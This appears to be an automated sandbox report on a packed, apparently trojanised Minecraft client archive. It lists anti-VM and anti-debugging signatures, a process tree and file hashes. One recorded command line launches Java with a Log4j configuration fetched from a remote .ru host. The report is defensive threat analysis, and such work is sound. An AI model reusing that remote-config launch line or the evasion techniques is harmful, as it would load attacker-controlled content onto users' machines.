Malware Analysis Report

2024-10-10 08:10

Sample ID 240611-p4sfaaxejf
Target nightware_pasted.zip
SHA256 12c03ef329d173728898959b9f406d2fcecec97b21489ab1f8f9acca5066b036
Tags themida evasion
Score 9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Likely malicious

The file nightware_pasted.zip was found to be: Likely malicious.

Malicious Activity Summary

themida evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Checks BIOS information in registry

Themida packer

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-11 12:54

Signatures

Themida packer

themida

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 12:53

Reported

2024-06-11 12:59

Platform

win11-20240426-en

Max time kernel

274s

Max time network

271s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\nightware_pasted.zip

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Themida packer

themida

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2551177587-3778486488-1329702901-1000\{53AD200A-852E-43D8-B5AB-B07AAFDC3AD1} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 1156 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
PID 2740 wrote to memory of 2588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
PID 2588 wrote to memory of 4900 N/A C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe C:\Windows\SYSTEM32\rundll32.exe
PID 4900 wrote to memory of 3908 N/A C:\Windows\SYSTEM32\rundll32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 2704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\nightware_pasted.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "

C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe

jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "

C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe

jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client

C:\Windows\SYSTEM32\rundll32.exe

rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4636 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "

C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe

jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client

C:\Windows\SYSTEM32\rundll32.exe

rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1

Network


Files


memory/2588-66-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-211-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1791b52056684a19047b902fa6b9b3db
SHA1 85448349d72f67ea96bed61cb364e0eccc3a1783
SHA256 121437c527a35287271f1341b7ec52a1ec0302f854c73fba1ea585bd281e272f
SHA512 90971580f8cf1c4d23d764c6f96101bdd0c0af7e09dfbdb7b4543335fd7181eac5a4a9b86198440333e871df2a78a751e7ddfdf3eda7f07ccddf45fa63a59cf3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 79af9856cf72c70ef72f7b642d581da7
SHA1 7b1609c4bb1674674126a6e51b7e9d21708ded1e
SHA256 39fcada3c2fd547e937a4e293871a89b61f5d165658a7bda49b76fbd4e79bb94
SHA512 784d5dafd81e5efd161a8229b4b62eacdc8d7381c7c0fe3a653623f3e55e910359e5c3294ddda8979242e9382246b698e9fa6d92eff25ab1c7cc8d747736a471

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b0a65b2653a7ef4a114a955d7e2a622f
SHA1 690a56763a7fb21016cb26094337a195678fb8a7
SHA256 a05c8e00594885eb28e3d9e26eb8541cf57ab940e1a9887486958724db68d9f7
SHA512 dd81bd2fa3e7a75cc714036feddd09251870c3e4269500e0b5418531d9d189b3e69768987740b2ad7e7f38e932eb2a04b3e563a578ffdab0064b78e29998b57a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 02bb8e97e505c1e118f6fccbf4c7f861
SHA1 f69d54cd2f82ad0d36b943e70c78b0e10ee78430
SHA256 9cc8765766fa3b1e437df4818ed0bc2bee0a2b18fc7f51c3f96577629dec6387
SHA512 cd1a6f799cb23ad2e6310c4eb4ad5475bd303b7647966c8dd9114638e4eac2b6c1737bd492353f6e0caee7c21f8d88752a375981234b3db71479e9e4f83f7daa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 30772dae3ba4f21f0e8b576871624f4e
SHA1 47a898e67494cc8a19e91d87c3952acb8780fb6d
SHA256 6c6eba42979b22b5b5b3ebf5ef65c5fafdf88539119eb491f24fad15277e0e06
SHA512 a36a2157fc098b3823980ca6868d237056ce553e9130ac0ea6a626e90032734203175faaac933d167dba9f59ac67c81fd96d1bde1d84d1295a6afb71adeba66c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a83a8.TMP

MD5 81cdfee7f70ba7539c582a88b3b44fd7
SHA1 d75d0a5d7f226214f1e9d665432c7ac89409fd0d
SHA256 7d49051a47b7427bf044f60f39a1a47084fb1969d7ec14e8a5046d4d72442554
SHA512 6aea4256bb557da384ca529e616390533acab120463ed283acb9efa258cc382c5bbfc083606501495ee701254ea12433f15829e77dc2c4bd06d6ff225c11902d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b364226d880119bdc498fcd1e92c9f68
SHA1 f5d9979654d08f198e3d3dc661e08b2597eaca02
SHA256 6c60c1e32f605ac48cd1d9dea671c46e22d868a947dcdde3d4093c47096482e9
SHA512 42f72d7d160e0b883009bd2ac76b14f78da590c3566514d61c6d0380f3db9fab8786af43218e869f8ec2aa8cb23899690bf4f8f3410657f3dedb331f9690f315

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 263873fd2ad0c10f02404b207d1190b8
SHA1 ed65c13e6f730b2d7e6da669b9f0c76a1683b26a
SHA256 976cb80c6c561faf6b70b761ec1f5347718a2557820bf64b92cdaf46fd21c6c0
SHA512 3fe38c79c35be5058008d0309ff6438bc2760aaccbdeb851cd9fcd223cb8e58997ff6bc9383e0b9cd079f7e10d44379bf3dcf38f853e8c1e17e60b59f0cd0562

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8a73fdff70d2f7012d60f4f305a27852
SHA1 f196eef59676d777846c11fdbe2f4595aa982910
SHA256 4a6f967836ac15005e4959ae91821e6d4552c2406e5005c945ec4bd0f9fb63a9
SHA512 fa39a315b876acc784e992079bf465e8830da5d780935e9f79938bc9843ce069f11a288f9d699b1d359ad8aa1b107c6070e2bbcbd79e0ca749a48f356b7295c5

memory/6028-544-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-545-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-546-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-547-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-548-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d03cb29dab407a31240f04acd2ea54d5
SHA1 40e4fea68fa1ddb2c05ee3ca6b45e2740344ba7b
SHA256 6403bdd730b256bfad120c929db6602600c84707c5743a9f7666084085e1b9fe
SHA512 1ae1790ee6265f5701d1696d855fd065b5447b6e8eab18f5d2393e16cda4f192c9d125d80c8bfd68cecc855d9d1cd2462be0fc6daa726bb97920ecb5f7746dae

memory/6028-550-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-549-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 07bd004322d7b2832709191bddd0567a
SHA1 9149ed0c2466995a3b6dd5182865a78fd76ec0ea
SHA256 6160a9f25b0dba39f0325b3268e0c00e2c374fd278fd1e90edc2fa87271b55bd
SHA512 28de08cc0284652a62600ea99583a758e83b8c79e10982a8fb11058bb5bfeac5570ecc51b4c58589e8f1b821645839ea5639dbdea2071bd1af9d0d4145e2d944

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2551177587-3778486488-1329702901-1000\83aa4cc77f591dfc2374580bbd95f6ba_f3dcadc9-113d-4c66-8517-189abc125a61

MD5 c8366ae350e7019aefc9d1e6e6a498c6
SHA1 5731d8a3e6568a5f2dfbbc87e3db9637df280b61
SHA256 11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238
SHA512 33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd

memory/6028-729-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-757-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a7b39ab2b35bea67f90050cb2ad1caa
SHA1 e519ce5d656032a0435deb56e9cdee0a9159edf4
SHA256 d770282ba7d589cca06af59f1ebdb7f46a1e27412acd63153b0bc0b860e8c2a1
SHA512 a9e900ed7775cc45337f4e74655ecd6ccdae715ec397c3487c6a2d01bcf327b0950ff16b04eca2ed760c0011ed210fbc42e37952499509aef866142b2119052a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7d87af219fe4088e07c33886edaba040
SHA1 72dc27f6b49b0bd9e520c391f9986a16132c0e56
SHA256 1cff4da5fb2be3aae9da26184004ce2973f07909702053f0fbf01ffbfacaa767
SHA512 ffb51c2c6fa5f3c68d9d6b5d62c4b946c40ec8fc8d47f0cf1cc2070b7acef983a3350c0201138f8536585c503427a7c8c7f72e92100c89b297d2bb7eff62a5d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 6b318b908a9618017e97ab21fdbbb339
SHA1 9122af9f2814c73c0dd158b329f1d434e05e2966
SHA256 6ea1b85df4b6c151b00f8e7b88396f10c3052f42e62767893d2fc6862f3eb026
SHA512 8f94a7742470b4d18b3f70859e3903be55d2bcb6a01421f49dbb4e685e3365798914201b905e849e5ca8b01eb97cd74237d3a3389d777c3be23529d0c27d7f5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 717451e9ea2787fbc0966f9584b0e4cc
SHA1 636b3104f3d3410dbe0bd3944ad9629f771529e4
SHA256 d7d579814018385fcafdafeab2d622dbb234eea487cc77cfef9dc7cbd4adde99
SHA512 8178a5471deb17e234624625562141e9e22455465f32457230e4dc85c8d833975ef598232a660367b05c182910313564e16f2f0571a1ad310b7bd7f6e957a590

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9269ebfd6a99751ed8995ff3e3f8179b
SHA1 a8062f75a114d0dcc731952e40ae42e86ac8dd73
SHA256 3bc18611978785f6c8f45e106ad1d155e3ff0536c4946db796a54eb7c29369b1
SHA512 a10d50fbdf5aa47500583b41821bd0acb1ac0f5bd6eb7b973dad8ec9b9a69a91df12d06a8b95c57272ff0430ca95acc1628d276ea93270c2746ef39fe945bb2b